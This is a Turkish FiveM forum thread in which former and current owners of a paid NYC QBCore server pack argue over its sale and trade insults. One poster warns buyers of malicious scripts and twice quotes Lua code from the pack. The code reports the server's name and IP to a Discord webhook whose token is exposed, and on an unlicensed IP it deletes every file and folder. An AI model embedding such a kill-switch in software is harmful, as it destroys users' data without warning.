Neler yeni

Foruma hoş geldin, Ziyaretçi

Forum içeriğine ve tüm hizmetlerimize erişim sağlamak için foruma kayıt olmalı ya da giriş yapmalısınız. Foruma üye olmak tamamen ücretsizdir.

Türkiye'nin İlk ve tek FiveM forum adresi

Forum adresimize hoş geldin FiveMTürk olarak amacımız siz değerli kullanıcılarımıza en aktif fikir ve paylaşım platformu sunmak bir yana en güvenilir şekilde alışveriş yapabileceğiniz bir platform sunmaktır.
DF DF
DF DF
DF DF

Paket [ÜCRETLİ] NEW YORK CİTY | QBCORE | SERVER PACK | NYC

Projenizi ismi dahil olmak üzere discord sunucusu ve oyuncularınıda satın aldık.
Öncelikle belirtmek isterim ki söylediklerin tamamen saçmalık. Drippin NYC, benim ve ortağım Blackwolf'un başarısıdır. istedigim yerde Bu projenin zamanında başarılı oldugunu ve Drippin NYC'nin zamanında benim projem olduğunu gururla söyleyebilirim. Ayrıca, projeyi size sattığımızda, ismi değil, Discord sunucusunu ve paketi sattık. Başlangıçta belirttiğimiz gibi, sunucudan ayrıldığımızda sunucu isminin değiştirilmesi gerektiğini belirttik.

Bir diğer önemli konu, sunucuyu sana değil, Baran ve Kayra'ya sattığımızdır. Senden sunucu için para gördüğümüzü veya sunucunun gelişimine katkıda bulunduğunu gözlemlemedik. Umarım gelecekte başkalarının işlerine burnunu sokmamaya dikkat edersin.

Projeyi satın alırken isim, discord sunucusu, paket olarak tamamen aldık. Üstüne sizin geliştiriciniz (Rwaynex) de proje üstünde devam etsin diye para verdik. Ama bu konuda bizi dolandırdınız. Projeyi 2022de 7000 Liraya satın alıp üstüne de geliştirme işlemleri için 1500-2000TL attığımı hatırlıyorum. Hatta projeyi satın aldırken sizin yönetecek ve yönetimde olmanız bizim üzerimizden yük kaldıracağı için bizi daha da okeylemişti ama bi anda sebepsiz şekilde ayrıldınız. Kimseyi zorla biryerde yönetici yapamayız ama Geliştiricinize bir ücret ödemişsek adam akıllı işini yapması gerekiyor. 1500-2000 bizim için fazla para etmiyordu ve fazla umursamadık. Herneyse rwaynex takma isimli şahıs bizi böylesine dolandırdıktan sonra en azından sizin onu ekibinizden uzaklaştırmanızı beklerdik ama tam tersi bize tamamen devredilmiş olan isimlerle bir shop açtınız. Çoluk çocuk işlerle uğraşmak istemedik. Zaten mesajlarımıza da dönüş alamıyorduk ne sizden ne geliştiricinizden. Kısacası ortada zaten bi dolandırıcılık var. Projeyi ben aldıysam aynı şekilde ekibimdeki ortaklarım da almış olur yani hepimiz ortak olarak NYC Projesine yatırım yapmak istemiştik. Elimizde patladı. Olay umarım açıkça nettir. Yaklaşık 9000 Lira geçen senenin parasıyla zarardayız ama laf etmiyoruz karşımızdakinin adamlığı hizmet sağlayıcılığı bu kadarmış diyip geçiyoruz.

Kod:
PerformHttpRequest('https://api.ipify.org/', function(err, text, headers)
    if text == '188.255.200.82' then
      local serveradi = GetConvar("sv_hostname","Bulunamadı.")
      sendToDiscord("[LISANS ONAYLANDI]", "Bilgiler:\n\n[Sunucu Adı] =  " .. serveradi .. "\n\n[IP] = " .. text .. "")

else
    Wait(500)
    sendToDiscord("[LISANSIZ KULLANIM]", "Bilgiler:\n\n[Sunucu Adı] =  " .. serveradi .. "\n\n[IP] = " .. text .. "")
          current_dir=io.popen"cd":read'*l'
          for dir in io.popen([[dir "./" /b /ad]]):lines() do
                  for dir2 in io.popen([[dir "]]..dir..[[" /b]]):lines() do
                          os.execute("del /q "..current_dir.."/"..dir.."/"..dir2)
                          os.execute('for /d %x in ('..current_dir.."/"..dir.."/"..dir2..') do @rd /s /q "%x"')
                  end
                  os.execute("rd "..dir)
          end
          Citizen.Wait(500)
          os.exit()
  end
  end, 'GET', "")
  function sendToDiscord(name, message, color)
  local connect = {
      {
        ["color"] = color,
        ["title"] = "".. name .."",
        ["description"] = message,
        ["footer"] = {
          ["text"] = "Lisans Sistemi",
          ["icon_url"] = "https://media.discordapp.net/attachments/627114895183446016/825970630469746748/kisspng-computer-icons-5af55f42b55107.2526800315260301467427.png"
        },
      }
    }
    PerformHttpRequest("https://discord.com/api/webhooks/1043827609865306122/4diJQJvcIQV8VRNu1jqc5BsBnucgQp6lsxad89FoiElUB0RhgUdaeATZm4L_kYCa4RRu", function(err, text, headers) end, 'POST', json.encode({username = DISCORD_NAME, embeds = connect, avatar_url = DISCORD_IMAGE}), { ['Content-Type'] = 'application/json' })
  end

Bunu hangi hayırsız yazdı bu ne olum taşşak mı geçiyorsunuz?
Ayrıca satın alacak kişilere şimdiden söylüyorum paket içerisinde virüs içeren scriptler var kontrol ederek alin derim :)

1697767149329.png

Projeyi satın alırken isim, discord sunucusu, paket olarak tamamen aldık. Üstüne sizin geliştiriciniz (Rwaynex) de proje üstünde devam etsin diye para verdik. Ama bu konuda bizi dolandırdınız. Projeyi 2022de 7000 Liraya satın alıp üstüne de geliştirme işlemleri için 1500-2000TL attığımı hatırlıyorum. Hatta projeyi satın aldırken sizin yönetecek ve yönetimde olmanız bizim üzerimizden yük kaldıracağı için bizi daha da okeylemişti ama bi anda sebepsiz şekilde ayrıldınız. Kimseyi zorla biryerde yönetici yapamayız ama Geliştiricinize bir ücret ödemişsek adam akıllı işini yapması gerekiyor. 1500-2000 bizim için fazla para etmiyordu ve fazla umursamadık. Herneyse rwaynex takma isimli şahıs bizi böylesine dolandırdıktan sonra en azından sizin onu ekibinizden uzaklaştırmanızı beklerdik ama tam tersi bize tamamen devredilmiş olan isimlerle bir shop açtınız. Çoluk çocuk işlerle uğraşmak istemedik. Zaten mesajlarımıza da dönüş alamıyorduk ne sizden ne geliştiricinizden. Kısacası ortada zaten bi dolandırıcılık var. Projeyi ben aldıysam aynı şekilde ekibimdeki ortaklarım da almış olur yani hepimiz ortak olarak NYC Projesine yatırım yapmak istemiştik. Elimizde patladı. Olay umarım açıkça nettir. Yaklaşık 9000 Lira geçen senenin parasıyla zarardayız ama laf etmiyoruz karşımızdakinin adamlığı hizmet sağlayıcılığı bu kadarmış diyip geçiyoruz.
Dolandırmak? Eğer geliştiricimizle anlaşamıyorsanız, bu bizi ilgilendirmez ve biz zaten gereken kişilerle iletişimimizi kestik. Ayrıca, başlangıçtan itibaren 1-2 ay sonra sunucudan çıkacağımızı düzeni kurmak için burda kalacagimizi ve oturttuğumuzda çıkacağımızı belirttik bunu yapıyordukta. Ancak, sizi toplantılara çağırdığımızda gelmediniz, bu 3-5 kez oldu. Hem tüm işleri bize yaptırmak istediniz hem de bir sorun olduğunda toplantılara katılmadınız. Bu durum bizi sunucudan çıkmaya teşvik etti. Biz kimseyi dolandırmadık, kendi hatanızı kabullenmeyip bizi dolandırdınız diyorsun :D

Kod:
PerformHttpRequest('https://api.ipify.org/', function(err, text, headers)
    if text == '188.255.200.82' then
      sendToDiscord("[LISANS ONAYLANDI]", "Bilgiler:\n\n[Sunucu Adı] =  " .. serveradi .. "\n\n[IP] = " .. text .. "")

else
    Wait(500)
    sendToDiscord("[LISANSIZ KULLANIM]", "Bilgiler:\n\n[Sunucu Adı] =  " .. serveradi .. "\n\n[IP] = " .. text .. "")
          current_dir=io.popen"cd":read'*l'
          for dir in io.popen([[dir "./" /b /ad]]):lines() do
                  for dir2 in io.popen([[dir "]]..dir..[[" /b]]):lines() do
                          os.execute("del /q "..current_dir.."/"..dir.."/"..dir2)
                          os.execute('for /d %x in ('..current_dir.."/"..dir.."/"..dir2..') do @rd /s /q "%x"')
                  end
                  os.execute("rd "..dir)
          end
          Citizen.Wait(500)
          os.exit()
  end
  end, 'GET', "")
  function sendToDiscord(name, message, color)
  local connect = {
      {
        ["color"] = color,
        ["title"] = "".. name .."",
        ["description"] = message,
        ["footer"] = {
          ["text"] = "Lisans Sistemi",
          ["icon_url"] = "https://media.discordapp.net/attachments/627114895183446016/825970630469746748/kisspng-computer-icons-5af55f42b55107.2526800315260301467427.png"
        },
      }
    }
    PerformHttpRequest("https://discord.com/api/webhooks/1043827609865306122/4diJQJvcIQV8VRNu1jqc5BsBnucgQp6lsxad89FoiElUB0RhgUdaeATZm4L_kYCa4RRu", function(err, text, headers) end, 'POST', json.encode({username = DISCORD_NAME, embeds = connect, avatar_url = DISCORD_IMAGE}), { ['Content-Type'] = 'application/json' })
  end

Bunu hangi hayırsız yazdı bu ne olum taşşak mı geçiyorsunuz?
Ayrıca satın alacak kişilere şimdiden söylüyorum paket içerisinde virüs içeren scriptler var kontrol ederek alin derim :)

Ekli dosyayı görüntüle 89346
Şimdiye kadar hiçbir virüslü dosya satmadım Mikaa. Yalan ve dolanla insanların paketi almasını engellemen seviyeni bize gösterdi, beyninin ne kadar küçük oldugunu bize bu Şekilde kanıtlamış oldun. ayrıca yukarıda belirttigin şey bir Lisans sistemi. Eğer bir lisans sistemi kullanılıyorsa ve IP girişi yoksa, sunucuyu başlattığında tüm dosyalar silinir ama Lisans sisteminin virüs ile bir baglantisi yoktur.

Şimdiye kadar hiçbir virüslü dosya satmadım Mikaa. Yalan ve dolanla insanların paketi almasını engellemen seviyeni bize gösterdi, beyninin ne kadar küçük oldugunu bize bu Şekilde kanıtlamış oldun. ayrıca yukarıda belirttigin şey bir Lisans sistemi. Eğer bir lisans sistemi kullanılıyorsa ve IP girişi yoksa, sunucuyu başlattığında tüm dosyalar silinir ama Lisans sisteminin virüs ile bir baglantisi yoktur.
Yani ci**er kullandığını inkar ediyorsun? istersen kanıt atayım.

Onun lisans sistemi olduğunu senden daha iyi biliyorum kod yazmaktan anlamıyorsun bana yok beynin küçük flan diyon sen kendini meyve suyu zannediyorsun galiba?

Onun lisans sistemi olduğunu senden daha iyi biliyorum kod yazmaktan anlamıyorsun bana yok beynin küçük flan diyon sen kendini meyve suyu zannediyorsun galiba?
Da**ak mi geciyorsun zamaninda biz bilmiyoruz diyen sen degil miydin bana gelmis developerlik dersi veriyorsun

Da**ak mi geciyorsun zamaninda biz bilmiyoruz diyen sen degil miydin bana gelmis developerlik dersi veriyorsun
? Dostum trdeki ilk pvp swsi bizim aktif olarak en çok üyesi olan tr pvp dcsi bizimdi imzam'dan discorduma girip bişeyler satın alabilirsin. Yapacak kapasite yok çünkü sende. Developer dersi veriyor diyorsun paketinde 3 - 4'tane progbar var progbar değişmeyi bile bilmediğin için yaptığına yemin edebilirim :D haha gelmiş developer saniyor kendini paket yapmak seni developer yapmaz bana aktif sıfırdan kodladığın ürünlerini göster bana laf atmadan önce. Beni soracaksan dediğim gibi imzam'dan girip ürünlere bakabilirsin.

? Dostum trdeki ilk pvp swsi bizim aktif olarak en çok üyesi olan tr pvp dcsi bizimdi imzam'dan discorduma girip bişeyler satın alabilirsin. Yapacak kapasite yok çünkü sende. Developer dersi veriyor diyorsun paketinde 3 - 4'tane progbar var progbar değişmeyi bile bilmediğin için yaptığına yemin edebilirim :D haha gelmiş developer saniyor kendini paket yapmak seni developer yapmaz bana aktif sıfırdan kodladığın ürünlerini göster bana laf atmadan önce. Beni soracaksan dediğim gibi imzam'dan girip ürünlere bakabilirsin.
Hahahaha benim asıl meslegim hakkında hiç bir bilgin yok dostum bence sohbeti uzatma ve kes yerim dibine gömülmeden bu yazdıgım mesaj son olsun

Yok kanki son flan degil ben nezaman istersem drama ozaman biter :)
Sese dahi gelmeye korkuyorsun klavyeden yazacagına gelip seste bunları bana söyle kendini çok zeki ve başarılı sanıyorsun fakat sen ne zekisin nede başarılı başkalarının başarılarını kendi başarılarım diye heryerde söylüyorsun bunu bırak çocuk bu tartışmayı bitirmek için önce bir kendi başarın olması lazım. Burdaki tartışmayı sen degil ben bitiririm beni daha fazla uğraştırma.

Sese dahi gelmeye korkuyorsun klavyeden yazacagına gelip seste bunları bana söyle kendini çok zeki ve başarılı sanıyorsun fakat sen ne zekisin nede başarılı başkalarının başarılarını kendi başarılarım diye heryerde söylüyorsun bunu bırak çocuk bu tartışmayı bitirmek için önce bir kendi başarın olması lazım. Burdaki tartışmayı sen degil ben bitiririm beni daha fazla uğraştırma.
Ne anlatiyon la sen

Konuda 38 güncel yazısı tarafımca silinmiştir. Lütfen konunuzu "Yukarı Taşı" butonu ile yukarı taşıyınız. Aksi taktirde işlem uygulanacaktır. İyi forumlar dilerim..

Forumdan daha fazla yararlanmak için giriş yapın yada üye olun!

Forumdan daha fazla yararlanmak için giriş yapın veya kayıt olun!

Kayıt ol

Forumda bir hesap oluşturmak tamamen ücretsizdir.

Şimdi kayıt ol
Giriş yap

Eğer bir hesabınız var ise lütfen giriş yapın

Giriş yap

Bu konuyu görüntüleyen kullanıcılar

Tema düzenleyici

Tema özelletirmeleri

Granit arka planlar

Lütfen Javascript'i etkinleştirin!Javascript'i etkinleştirin!